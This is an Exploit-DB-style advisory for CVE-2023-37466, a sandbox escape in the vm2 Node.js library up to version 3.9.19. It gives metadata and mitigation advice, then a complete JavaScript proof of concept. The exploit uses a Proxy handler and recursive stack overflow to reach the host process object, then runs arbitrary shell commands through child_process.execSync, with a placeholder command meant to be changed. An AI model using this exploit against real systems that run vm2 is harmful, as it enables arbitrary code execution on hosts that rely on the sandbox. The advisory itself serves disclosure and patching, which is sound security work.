Vendor: vm2
By: Calil Khalil & Adriel Mc Roberts
CVSS: 9.1 CRITICAL
Sandbox Escape
CWE: 862
Product Name: vm2
Affected Version From: <= 3.9.19
Affected Version To: 3.9.19
Patch Exists: YES
Related CVE: CVE-2023-37466
CPE: patriksimek:vm2
Platforms Tested: Ubuntu 22.04
2023

vm2 Sandbox Escape Vulnerability

vm2 versions <= 3.9.19 are vulnerable to a sandbox escape. By executing specially crafted code, an attacker can break out of the sandbox and execute arbitrary commands on the host system. This vulnerability has been assigned CVE-2023-37466.

Mitigation:

To mitigate this vulnerability, it is recommended to update the vm2 library to version 3.9.20 or higher. Additionally, avoid executing untrusted code within the sandbox environment.

Exploit-DB raw data:

/*
# Exploit Title: vm2 Sandbox Escape vulnerability
# Date: 23/12/2023
# Exploit Author: Calil Khalil & Adriel Mc Roberts
# Vendor Homepage: https://github.com/patriksimek/vm2
# Software Link: https://github.com/patriksimek/vm2
# Version: vm2 <= 3.9.19
# Tested on: Ubuntu 22.04
# CVE : CVE-2023-37466
*/

const { VM } = require("vm2");
const vm = new VM();

const command = 'pwd'; // Change to the desired command

const code = `
async function fn() {
    (function stack() {
        new Error().stack;
        stack();
    })();
}

try {
    const handler = {
        getPrototypeOf(target) {
            (function stack() {
                new Error().stack;
                stack();
            })();
        }
    };

    const proxiedErr = new Proxy({}, handler);

    throw proxiedErr;
} catch ({ constructor: c }) {
    const childProcess = c.constructor('return process')().mainModule.require('child_process');
    childProcess.execSync('${command}');
}
`;

console.log(vm.run(code));